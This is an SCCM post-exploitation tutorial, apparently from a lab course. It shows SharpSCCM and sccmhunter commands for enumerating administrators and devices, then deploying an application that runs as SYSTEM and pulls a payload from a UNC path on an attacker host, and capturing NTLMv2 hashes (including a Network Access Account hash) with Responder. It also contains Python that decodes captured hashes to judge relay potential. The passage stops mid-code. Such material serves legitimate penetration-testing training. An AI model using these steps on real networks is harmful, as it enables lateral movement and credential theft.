SCCM Post-Exploitation
1. SCCM post-exploitation
SCCM exists to deploy applications and services to assets managed through Active Directory, which makes its infrastructure an ideal vehicle for lateral movement. With administrative rights on the primary site server we can push applications and scripts to any managed device, or coerce clients into authenticating to a host we control.
SCCM also lets us enumerate data about its resources. Among the services it offers administrators is CMPivot, which queries a computer or a collection of computers for all of their resources (installed software, local administrators, hardware specifications, and so on) and runs administrative tasks against them. CMPivot is driven through the AdminService, an HTTP REST API served by the SMS Provider.
1.1. Privileged account enumeration
Privileged SCCM users can be enumerated by querying two WMI classes, SMS_Admin and SMS_SCI_Reserved. sccmhunter's admin module does this for us: start it against the SMS Provider and run show_admins.
python3 sccmhunter.py admin -u rai -p Threathunting01 -ip 172.50.0.40
SCCMHunter v1.0.5 by @garrfoster
[09:04:17] INFO [!] Enter help for extra shell commands
() C:\ >> show_admins
[09:04:21] INFO Tasked SCCM to list current SMS Admins.
[09:04:22] INFO Current Full Admin Users:
[09:04:22] INFO LAB\sccm_admin
[09:04:22] INFO LAB\rai
1.2. Computer enumeration
To enumerate a target with CMPivot we first need the ResourceId of the resource to audit (a single machine or a collection). get_device <TARGET> returns the ResourceId of the target computer together with its other inventory fields:
python3 sccmhunter.py admin -u rai -p Threathunting01 -ip 172.50.0.40
SCCMHunter v1.0.5 by @garrfoster
[19:24:58] INFO [!] Enter help for extra shell commands
() C:\ >> get_device SCCM-SMS
[19:25:21] INFO [*] Collecting device...
[19:25:21] INFO [+] Device found.
[19:25:21] INFO ------------------------------------------
Active: 1
Client: 1
DistinguishedName: CN=SCCM-SMS,CN=Computers,DC=lab,DC=local
FullDomainName: LAB.LOCAL
IPAddresses: 172.50.0.40
LastLogonUserDomain: LAB
LastLogonUserName: Administrator
Name: SCCM-SMS
OperatingSystemNameandVersion: Microsoft Windows NT Server 10.0
PrimaryGroupID: 515
ResourceId: 16777221
ResourceNames: SCCM-SMS.lab.local
SID: S-1-5-21-2570265163-3918697770-3667495639-1216
SMSInstalledSites: HTB
SMSUniqueIdentifier: GUID:2A1F8462-FAAC-4F8A-BDF9-7194AF172C2C
------------------------------------------
sccmhunter sometimes returns the wrong ResourceId. Verify it with SharpSCCM, which queries SMS_R_System directly over WMI and prints the full record. Note that SharpSCCM's own query uses LIKE '%NAME%', so a short name can return several records; use the one whose Name field matches exactly:
PS C:\Tools> .\SharpSCCM.exe get devices -n SCCM-SMS -sms 172.50.0.40
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Using WMI provider: 172.50.0.40
[+] Connecting to \\172.50.0.40\root\SMS\site_HTB
[+] Executing WQL query: SELECT ResourceId,Active,ADSiteName,Client,DistinguishedName,FullDomainName,HardwareID,IPAddresses,IPSubnets,IPv6Addresses,IPv6Prefixes,IsVirtualMachine,LastLogonTimestamp,LastLogonUserDomain,LastLogonUserName,MACAddresses,Name,NetbiosName,Obsolete,OperatingSystemNameandVersion,PrimaryGroupID,ResourceDomainORWorkgroup,ResourceNames,SID,SMSInstalledSites,SMSUniqueIdentifier,SNMPCommunityName,SystemContainerName,SystemGroupName,SystemOUName FROM SMS_R_System WHERE Name LIKE '%SCCM-SMS%'
-----------------------------------
SMS_R_System
-----------------------------------
Active: 1
ADSiteName: Default-First-Site-Name
Client: 1
DistinguishedName: CN=SCCM-SMS,CN=Computers,DC=lab,DC=local
FullDomainName: LAB.LOCAL
HardwareID: 2:542AA89148DB7F12EE73FFE36E215010EF8F70E0
IPAddresses: 172.50.0.40
IPSubnets: 172.50.0.0
IPv6Addresses:
IPv6Prefixes:
IsVirtualMachine: True
LastLogonTimestamp: 20240722164258.000000+***
LastLogonUserDomain: SCCM-SMS
LastLogonUserName: Administrator
MACAddresses: 00:50:56:B9:61:89
Name: SCCM-SMS
NetbiosName: SCCM-SMS
Obsolete: 0
OperatingSystemNameandVersion: Microsoft Windows NT Server 10.0
PrimaryGroupID: 515
ResourceDomainORWorkgroup: LAB
ResourceId: 16777221
ResourceNames: SCCM-SMS.lab.local
SID: S-1-5-21-2570265163-3918697770-3667495639-1216
SMSInstalledSites: HTB
SMSUniqueIdentifier: GUID:2A1F8462-FAAC-4F8A-BDF9-7194AF172C2C
SNMPCommunityName:
SystemContainerName: LAB\COMPUTERS
SystemGroupName:
SystemOUName:
-----------------------------------
[+] Completed execution in 00:00:16.4663955
1.2.1. Interacting with the target
interact <ResourceId> then opens a session against that device; the administrators command asks CMPivot for the members of the local Administrators group:
() (C:\) >> interact 16777221
(16777221) (C:\) >> administrators
[19:26:31] INFO Tasked SCCM to run Administrators.
[19:26:31] INFO Got OperationId 16778237. Sleeping 10 seconds to wait for host to call home.
[19:26:41] INFO No results yet, sleeping 10 seconds.
[19:26:52] INFO +---------------+------------------------+-------------------+----------+
| ObjectClass | Name | PrincipalSource | Device |
+===============+========================+===================+==========+
| Group | LAB\Domain Admins | ActiveDirectory | SCCM-SMS |
+---------------+------------------------+-------------------+----------+
| User | LAB\sccm_admin | ActiveDirectory | SCCM-SMS |
+---------------+------------------------+-------------------+----------+
| User | LAB\SCCM01$ | ActiveDirectory | SCCM-SMS |
+---------------+------------------------+-------------------+----------+
| User | SCCM-SMS\Administrator | Local | SCCM-SMS |
+---------------+------------------------+-------------------+----------+
ls lists the files and folders on the target computer:
(16777221) (C:\) >> ls
[19:30:13] INFO Tasked SCCM to list files in C:\.
[19:30:13] INFO Got OperationId 16778238. Sleeping 10 seconds to wait for host to call home.
[19:30:23] INFO No results yet, sleeping 10 seconds.
[19:30:33] INFO +------------------------------+--------+---------------------+--------+----------+
| FileName | Mode | LastWriteTime | Size | Device |
+==============================+========+=====================+========+==========+
| C:\$Recycle.Bin | d--hs- | 2024-05-09 23:13:44 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\ContentLibrary | d----- | 2024-05-12 08:41:03 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\Documents and Settings | d--hsl | 2024-05-09 19:59:16 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\inetpub | d----- | 2024-05-09 22:46:15 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\PerfLogs | d----- | 2022-11-05 18:20:48 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\Program Files | d-r--- | 2024-05-10 13:14:30 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\Program Files (x86) | d----- | 2024-05-10 10:20:32 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\ProgramData | d--h-- | 2024-05-10 13:20:43 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\Recovery | d--hs- | 2024-05-09 20:00:28 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\SMS | d----- | 2024-05-10 10:22:38 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\System Volume Information | d--hs- | 2024-05-09 19:57:33 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\Users | d-r--- | 2024-05-09 23:13:26 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\Windows | d----- | 2024-05-10 15:10:18 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\smstsvc.log | -a---- | 2024-05-10 10:20:45 | 1042 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
Further commands are documented in the sccmhunter wiki.
2. Application deployment
2.1. Enumeration
SharpSCCM also lets us enumerate and abuse the SCCM infrastructure, provided our account holds the Full Administrator or Application Administrator role on the primary site.
2.1.1. Verifying the required rights
Query the SMS_Admin WMI class with SharpSCCM to confirm the rights. If the query is not rejected with access denied and our account is listed with the Full Administrator (or Application Administrator) role, we can proceed:
PS C:\Tools> .\SharpSCCM.exe get class-instances SMS_Admin -p CategoryNames -p CollectionNames -p LogonName -p RoleNames -sms 172.50.0.40
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Using WMI provider: 172.50.0.40
[+] Connecting to \\172.50.0.40\root\SMS\site_HTB
[+] Executing WQL query: SELECT AdminID,CategoryNames,CollectionNames,LogonName,RoleNames FROM SMS_Admin
-----------------------------------
SMS_Admin
-----------------------------------
CategoryNames: All
CollectionNames: All Systems, All Users and User Groups
LogonName: LAB\sccm_admin
RoleNames: Full Administrator
-----------------------------------
CategoryNames: All
CollectionNames: All Systems, All Users and User Groups
LogonName: LAB\rai
RoleNames: Full Administrator
-----------------------------------
[+] Completed execution in 00:00:00.8509888
2.1.2. Searching for targets
The next step is to find targets: active SCCM clients reachable on the network. We can go after machines that declare a given user as their "primary user" (an option in the Configuration Manager console that ties a user to a machine as its main user), or after the machine on which that user last authenticated.
The second approach is less reliable because it depends on how often the machine information is refreshed through DDRs (Discovery Data Records). Use get primary-users with -u <user> to find the computers whose primary user is blwasp:
PS C:\Tools> .\SharpSCCM.exe get primary-users -u blwasp -sms 172.50.0.40
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Using WMI provider: 172.50.0.40
[+] Connecting to \\172.50.0.40\root\SMS\site_HTB
[+] Executing WQL query: SELECT * FROM SMS_UserMachineRelationship WHERE UniqueUserName LIKE '%blwasp%'
-----------------------------------
SMS_UserMachineRelationship
-----------------------------------
CreationTime: 20240522185628.677000+000
IsActive: True
RelationshipResourceID: 25165831
ResourceClientType: 1
ResourceID: 16777233
ResourceName: SRV01
Sources: 2
Types: 1
UniqueUserName: LAB\blwasp
-----------------------------------
[+] Completed execution in 00:00:00.6255289
We can also list every active device with the SCCM client installed, but in a real environment that output can be enormous; get devices with -w <where-condition> narrows the WQL query server-side:
# only active machines that have the SCCM client installed
PS C:\Tools> .\SharpSCCM.exe get devices -w "Active=1 and Client=1" -sms 172.50.0.40
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Using WMI provider: 172.50.0.40
[+] Connecting to \\172.50.0.40\root\SMS\site_HTB
[+] Executing WQL query: SELECT ResourceId,Active,ADSiteName,Client,DistinguishedName,FullDomainName,HardwareID,IPAddresses,IPSubnets,IPv6Addresses,IPv6Prefixes,IsVirtualMachine,LastLogonTimestamp,LastLogonUserDomain,LastLogonUserName,MACAddresses,Name,NetbiosName,Obsolete,OperatingSystemNameandVersion,PrimaryGroupID,ResourceDomainORWorkgroup,ResourceNames,SID,SMSInstalledSites,SMSUniqueIdentifier,SNMPCommunityName,SystemContainerName,SystemGroupName,SystemOUName FROM SMS_R_System WHERE Active=1 and Client=1
-----------------------------------
SMS_R_System
-----------------------------------
Active: 1
ADSiteName: Default-First-Site-Name
Client: 1
DistinguishedName: CN=SQL,CN=Computers,DC=lab,DC=local
FullDomainName: LAB.LOCAL
HardwareID: 2:F6FC17A6192F8ADF5F0039F5A56CD2B3838E814D
IPAddresses: 172.50.0.30
IPSubnets: 172.50.0.0
IPv6Addresses:
IPv6Prefixes:
IsVirtualMachine: True
LastLogonTimestamp: 20240709192359.000000+***
LastLogonUserDomain: LAB
LastLogonUserName: administrator
MACAddresses: 00:50:56:B9:31:00
Name: SQL
NetbiosName: SQL
Obsolete: 0
OperatingSystemNameandVersion: Microsoft Windows NT Server 10.0
PrimaryGroupID: 515
ResourceDomainORWorkgroup: LAB
ResourceId: 16777219
ResourceNames: SQL.lab.local
SID: S-1-5-21-2570265163-3918697770-3667495639-1214
SMSInstalledSites: HTB
SMSUniqueIdentifier: GUID:BD861888-7840-427C-9CC6-D4FFE022F55A
SNMPCommunityName:
SystemContainerName: LAB\COMPUTERS
SystemGroupName:
SystemOUName:
-----------------------------------
Active: 1
ADSiteName: Default-First-Site-Name
Client: 1
DistinguishedName: CN=SCCM01,CN=Computers,DC=lab,DC=local
FullDomainName: LAB.LOCAL
HardwareID: 2:ECA2EFC6EA65B9B2280C0396F777019B4B52BEF8
IPAddresses: 172.50.0.21
IPSubnets: 172.50.0.0
IPv6Addresses: 0000:0000:0000:0000:0000:0000:0000:0001
IPv6Prefixes: 0000:0000:0000:0000
IsVirtualMachine: True
LastLogonTimestamp: 20240709194349.000000+***
LastLogonUserDomain: LAB
LastLogonUserName: sccm_admin
MACAddresses: 00:50:56:B9:52:50
Name: SCCM01
NetbiosName: SCCM01
Obsolete: 0
OperatingSystemNameandVersion: Microsoft Windows NT Server 10.0
PrimaryGroupID: 515
ResourceDomainORWorkgroup: LAB
ResourceId: 16777220
ResourceNames: SCCM01.lab.local
SID: S-1-5-21-2570265163-3918697770-3667495639-1215
SMSInstalledSites: HTB
SMSUniqueIdentifier: GUID:BB9B4076-B45A-46DA-8994-D2DAC705BB9A
SNMPCommunityName:
SystemContainerName: LAB\COMPUTERS
SystemGroupName:
SystemOUName:
...SNIP...
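Sections 1.1, 1.2, 2.1.1 and 2.1.2 all end up reading the same Key: Value records that SharpSCCM prints, and in a real environment the device dump is too large to read by eye. The following Python, added here and not part of SharpSCCM or sccmhunter, parses that record format once and answers the four questions those sections ask: who holds Full Administrator, which devices are active clients, which ResourceId belongs to a host, and which device a user is the primary user of. The three sample outputs are constructed from the records shown on this page, trimmed to a few fields; the OLDWS device and the obsolete duplicate SCCM01 record are invented to exercise the filters.

```python
"""Parse SharpSCCM 'get ...' output into records and answer the enumeration
questions on this page offline.  Added example, not SharpSCCM or sccmhunter
code.  Samples are constructed from records shown on this page, trimmed to a
few fields; OLDWS and the obsolete SCCM01 duplicate are invented."""
import re
from typing import Dict, List

SEPARATOR = re.compile(r"^-{5,}$")
CLASS_HEADER = re.compile(r"^(SMS_\w+)$")
FIELD = re.compile(r"^([A-Za-z0-9_]+):\s?(.*)$")

SMS_ADMIN_OUTPUT = r"""
[+] Executing WQL query: SELECT AdminID,CategoryNames,CollectionNames,LogonName,RoleNames FROM SMS_Admin
-----------------------------------
SMS_Admin
-----------------------------------
CategoryNames: All
CollectionNames: All Systems, All Users and User Groups
LogonName: LAB\sccm_admin
RoleNames: Full Administrator
-----------------------------------
CategoryNames: All
CollectionNames: All Systems, All Users and User Groups
LogonName: LAB\rai
RoleNames: Full Administrator
-----------------------------------
[+] Completed execution in 00:00:00.8509888
"""

DEVICES_OUTPUT = r"""
-----------------------------------
SMS_R_System
-----------------------------------
Active: 1
Client: 1
Name: SQL
Obsolete: 0
ResourceId: 16777219
-----------------------------------
Active: 1
Client: 1
Name: SCCM01
Obsolete: 0
ResourceId: 16777220
-----------------------------------
Active: 0
Client: 1
Name: SCCM01
Obsolete: 1
ResourceId: 16777300
-----------------------------------
Active: 0
Client: 0
Name: OLDWS
Obsolete: 0
ResourceId: 16777301
-----------------------------------
"""

PRIMARY_USERS_OUTPUT = r"""
-----------------------------------
SMS_UserMachineRelationship
-----------------------------------
IsActive: True
ResourceID: 16777233
ResourceName: SRV01
UniqueUserName: LAB\blwasp
-----------------------------------
"""


def parse_sharpsccm_records(text: str) -> List[Dict[str, str]]:
    """Split on the dashed separators; each 'Key: Value' block becomes a dict tagged
    with the SMS_* class header that preceded it.  Banner/progress lines are ignored."""
    records, current, class_name = [], {}, ""
    for raw in text.splitlines():
        line = raw.strip()
        if SEPARATOR.match(line):
            if current:
                current["_class"] = class_name
                records.append(current)
                current = {}
        elif CLASS_HEADER.match(line):
            class_name = line
        else:
            m = FIELD.match(line)
            if m:
                current[m.group(1)] = m.group(2).strip()
    if current:
        current["_class"] = class_name
        records.append(current)
    return records


def full_admins(records) -> List[str]:
    return sorted(r["LogonName"] for r in records
                  if r["_class"] == "SMS_Admin" and "Full Administrator" in r.get("RoleNames", ""))


def active_clients(records) -> List[Dict[str, str]]:
    return [r for r in records if r["_class"] == "SMS_R_System"
            and r.get("Active") == "1" and r.get("Client") == "1" and r.get("Obsolete") == "0"]


def resource_id_for(records, name: str) -> int:
    """Exact (case-insensitive) Name match with obsolete records excluded; refuse
    ambiguity rather than guess, since deploying to the wrong ResourceId is hard to undo."""
    ids = {r["ResourceId"] for r in records if r["_class"] == "SMS_R_System"
           and r.get("Obsolete") == "0" and r.get("Name", "").lower() == name.lower()}
    if len(ids) != 1:
        raise LookupError(f"{name}: expected one SMS_R_System record, found {len(ids)}")
    return int(ids.pop())


def primary_devices_for(records, user: str) -> List[str]:
    suffix = "\\" + user.lower()
    return sorted(r["ResourceName"] for r in records
                  if r["_class"] == "SMS_UserMachineRelationship" and r.get("IsActive") == "True"
                  and r.get("UniqueUserName", "").lower().endswith(suffix))
```

resource_id_for() insists on exactly one non-obsolete record whose Name matches exactly. SharpSCCM's query uses LIKE '%name%', and SCCM keeps obsolete records for clients that were reinstalled, so a loose name lookup can return several ResourceIds; refusing the ambiguous case is a cheap guard against the wrong-ResourceId problem described in section 1.2.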
Knowing where the SCCM clients are, and holding the rights above, we can deploy an application. This means creating a device collection, adding the target device to it, creating an application deployment tied to that collection, and finally triggering the deployment.
The application can run as SYSTEM, as the primary user, or as the user currently logged on to the machine. SharpSCCM automates the whole chain; as its output shows, it does so over WMI against the SMS Provider's root\SMS\site_<code> namespace rather than the AdminService. The automated path can hit timing problems because devices retrieve deployments with some delay, so in some situations it is safer to run the steps by hand.
If the application to deploy is specified as a UNC path, the accounts that fetch it authenticate to our host. This lets us capture NTLM authentication and potentially relay it instead of running a payload on the target, which is stealthier than installing and executing a program.
2.2. Deploying an application manually
2.2.1. Creating the application
First create an application named HTB_application with new application and -n <Application Name>. The payload is set with -p <Payload>, here a UNC path on our attack host, and -s makes the application run as SYSTEM:
PS C:\Tools> .\SharpSCCM.exe new application -s -n HTB_application -p \\10.10.14.207\share\test.exe -sms 172.50.0.40
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Using WMI provider: 172.50.0.40
[+] Connecting to \\172.50.0.40\root\SMS\site_HTB
[+] Creating new application: HTB_application
[+] Application path: \\10.10.14.207\share\test.exe
[+] Updated application to run as SYSTEM
[+] Successfully created application
[+] Completed execution in 00:00:29.0535194
2.2.2. Creating the collection
Next create a new device collection with new collection and -n <collection name>; -t device sets the collection type to "device":
PS C:\Tools> .\SharpSCCM.exe new collection -n "new_collection" -t device -sms 172.50.0.40
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Using WMI provider: 172.50.0.40
[+] Connecting to \\172.50.0.40\root\SMS\site_HTB
[+] Creating new device collection: new_collection
[+] Successfully created collection
[+] Completed execution in 00:00:01.6775452
2.2.3. Adding a member
Add the target computer to new_collection with new collection-member, naming the device with -d <DEVICE>:
PS C:\Tools> .\SharpSCCM.exe new collection-member -d SRV01 -n "new_collection" -t device -sms 172.50.0.40
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Using WMI provider: 172.50.0.40
[+] Connecting to \\172.50.0.40\root\SMS\site_HTB
[+] Found resource named SRV01 with ResourceID 16777233
[+] Added SRV01 (16777233) to new_collection
[+] Waiting for new collection member to become available...
[+] New collection member is not available yet... trying again in 5 seconds
[+] New collection member is not available yet... trying again in 5 seconds
[+] Successfully added SRV01 (16777233) to new_collection
[+] Completed execution in 00:00:16.7721935
2.2.4. Creating the deployment
Create a new deployment with new deployment, specifying the application with -a <application name> and the collection with -c <collection name>:
PS C:\Tools> .\SharpSCCM.exe new deployment -a HTB_application -c "new_collection" -sms 172.50.0.40
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Using WMI provider: 172.50.0.40
[+] Connecting to \\172.50.0.40\root\SMS\site_HTB
[+] Creating new deployment of HTB_application to new_collection (HTB0002E)
[+] Found the HTB_application application
[+] Successfully created deployment of HTB_application to new_collection (HTB0002E)
[+] New deployment name: HTB_application_HTB0002E_Install
[+] Completed execution in 00:00:02.8199982
2.2.5. Triggering a policy update
Now wait for the device to retrieve the deployment and run the application. invoke update asks the collection members to refresh their machine policy immediately, which can speed this up but does not always work:
PS C:\Tools> .\SharpSCCM.exe invoke update -n "new_collection" -sms 172.50.0.40
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Using WMI provider: 172.50.0.40
[+] Connecting to \\172.50.0.40\root\SMS\site_HTB
[+] Forcing all members of new_collection (HTB0002E) to retrieve machine policy and execute any new applications available
[+] Completed execution in 00:00:00.8182697
2.2.6. Capturing the hashes
On our attack host, Responder receives NTLMv2 authentication from the machine account:
responder -I tun0 -v -A
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Listening for events...
[+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
[SMB] NTLMv2-SSP Client : 10.129.230.38
[SMB] NTLMv2-SSP Username : LAB\SERVER-CLIENT$
[SMB] NTLMv2-SSP Hash : SERVER-CLIENT$::LAB:daf32ceafb...SNIP...
[SMB] NTLMv2-SSP Client : 10.129.230.38
[SMB] NTLMv2-SSP Username : LAB\sccm_naa
[SMB] NTLMv2-SSP Hash : sccm_naa::LAB:7c9ecd471a096e11:76576CE6ED016127D01C2295A8E6E4A4:010100000000000080DA01C483ACDA01A340CC85D16B99630000000002000800490054005500550001001E00570049004E002D00560034004E00450037003600370030004D005900430004003400570049004E002D00560034004E00450037003600370030004D00590043002E0049005400550055002E004C004F00430041004C000300140049005400550055002E004C004F00430041004C000500140049005400550055002E004C004F00430041004C000700080080DA01C483ACDA0106000400020000000800300030000000000000000000000000400000AC33ACB2A278803189F1A999B1F72A9F8EBB12FAF56C31BA15A02FB9E9C85AFB0A001000000000000000000000000000000000000900220063006900660073002F003100390032002E003100360038002E0031002E00380031000000000000000000
...SNIP...
The machine account's authentication failed, which triggered the fallback to the Network Access Account (NAA), so the NAA authenticated as well. If the WebClient service is running on the target, the authentication can instead be captured over HTTP and relayed to the domain controller's LDAP service to take over the machine.
If the domain controller's policy blocks anonymous access to shares, we cannot host the file this way. We can still use the UNC path purely to collect NTLM authentications, as in the example above, or host the file on any shared folder of a domain-joined computer.
Note: this method can take a long time to take effect; if immediate access is needed, use the script deployment method below.
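The NTLMv2 response Responder prints carries more than a crackable hash: the client's AV_PAIR list records the SPN the client thought it was authenticating to, whether it supplied a MIC, and whether the authentication is bound to a TLS channel (the channel bindings that Extended Protection checks). Those fields decide whether a capture like the NAA fallback above is a relay candidate. The following Python, added here and not part of Responder, sccmhunter or SharpSCCM, decodes a Responder-format line and assesses it. The sample line is built by make_sample_line() with a dummy NTProofStr so the code runs offline; the host names WIN-ATTACK and win-attack.lab.local are assumptions, and the cifs/10.10.14.207 target matches the UNC path used for the deployment.

```python
"""Decode a Responder "NTLMv2-SSP Hash" line and judge whether the capture is
a relay candidate.  Added example, not Responder/sccmhunter/SharpSCCM code.
The sample line is built offline by make_sample_line() with a dummy NTProofStr;
a real Responder line has the same user::domain:challenge:proof:blob layout."""
import struct
from datetime import datetime, timedelta, timezone
from typing import List, Tuple

# AV_PAIR ids, MS-NLMP 2.2.2.1
AV_NAMES = {1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName", 3: "MsvAvDnsComputerName",
            4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName", 6: "MsvAvFlags",
            7: "MsvAvTimestamp", 8: "MsvAvSingleHost", 9: "MsvAvTargetName",
            10: "MsvAvChannelBindings"}
AV_FLAGS, AV_TIMESTAMP, AV_TARGET_NAME, AV_CHANNEL_BINDINGS = 6, 7, 9, 10
STRING_AVS = {1, 2, 3, 4, 5, 9}
FLAG_MIC_PRESENT = 0x2                      # MsvAvFlags bit: client sent a MIC
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def parse_av_pairs(data: bytes, offset: int) -> List[Tuple[int, bytes]]:
    """Walk the AV_PAIR list up to MsvAvEOL, refusing truncated input."""
    pairs = []
    while True:
        if offset + 4 > len(data):
            raise ValueError("AV_PAIR list not terminated by MsvAvEOL")
        av_id, av_len = struct.unpack_from("<HH", data, offset)
        offset += 4
        if av_id == 0:
            return pairs
        if offset + av_len > len(data):
            raise ValueError("truncated AV_PAIR")
        pairs.append((av_id, data[offset:offset + av_len]))
        offset += av_len


def parse_ntlmv2_hash_line(line: str) -> dict:
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("expected user::domain:challenge:ntproofstr:blob")
    user, _, domain, challenge, proof, blob_hex = parts
    blob = bytes.fromhex(blob_hex)
    # NTLMv2_CLIENT_CHALLENGE (MS-NLMP 2.2.2.7): RespType=1, HiRespType=1, 6 reserved,
    # 8 timestamp, 8 client challenge, 4 reserved, then AV_PAIRs from offset 28
    if len(blob) < 28 or blob[0] != 1 or blob[1] != 1:
        raise ValueError("not an NTLMv2_CLIENT_CHALLENGE blob")
    av, flags, target_spn, channel_bindings = {}, 0, None, None
    for av_id, value in parse_av_pairs(blob, 28):
        name = AV_NAMES.get(av_id, f"Unknown_{av_id}")
        if av_id in STRING_AVS:
            av[name] = value.decode("utf-16-le")
        elif av_id == AV_TIMESTAMP:
            av[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        elif av_id == AV_FLAGS:
            av[name] = flags = struct.unpack("<I", value)[0]
        else:
            av[name] = value.hex()
        if av_id == AV_TARGET_NAME:
            target_spn = av[name]
        elif av_id == AV_CHANNEL_BINDINGS:
            channel_bindings = value
    return {"user": user, "domain": domain, "server_challenge": challenge.lower(),
            "ntproofstr": proof.lower(), "client_challenge": blob[16:24].hex(),
            "client_timestamp": filetime_to_datetime(struct.unpack_from("<Q", blob, 8)[0]),
            "flags": flags, "target_spn": target_spn,
            "channel_bindings": channel_bindings, "av": av}


def relay_assessment(info: dict) -> dict:
    cb = info["channel_bindings"]
    return {
        # A MIC protects the three NTLM messages from tampering; it does not block relay.
        "mic_present": bool(info["flags"] & FLAG_MIC_PRESENT),
        # All-zero/absent bindings: auth is not tied to a TLS channel, so a relay target
        # enforcing EPA still accepts it; non-zero bindings defeat relay to TLS endpoints.
        "channel_binding_present": cb is not None and any(cb),
        # SPN the client believed it was talking to.  Relay of SMB-originated auth to
        # LDAP is stopped by LDAP signing enforcement on the DC, not by this value.
        "target_spn": info["target_spn"],
        "machine_account": info["user"].endswith("$"),
    }


def build_ntlmv2_blob(ts: datetime, client_challenge: bytes,
                      av_pairs: List[Tuple[int, bytes]]) -> bytes:
    blob = bytes([1, 1]) + b"\x00" * 6 + struct.pack("<Q", datetime_to_filetime(ts))
    blob += client_challenge + b"\x00" * 4
    for av_id, value in av_pairs:
        blob += struct.pack("<HH", av_id, len(value)) + value
    return blob + struct.pack("<HH", 0, 0) + b"\x00" * 4


def make_sample_line(channel_bindings: bytes = b"\x00" * 16) -> str:
    """Constructed: NAA sccm_naa of LAB authenticating to the attacker's share at
    10.10.14.207 (the UNC host used above).  Host names and NTProofStr are invented."""
    u16 = lambda s: s.encode("utf-16-le")
    ts = datetime(2024, 7, 22, 16, 42, 58, tzinfo=timezone.utc)
    av = [(2, u16("LAB")), (1, u16("WIN-ATTACK")), (4, u16("lab.local")),
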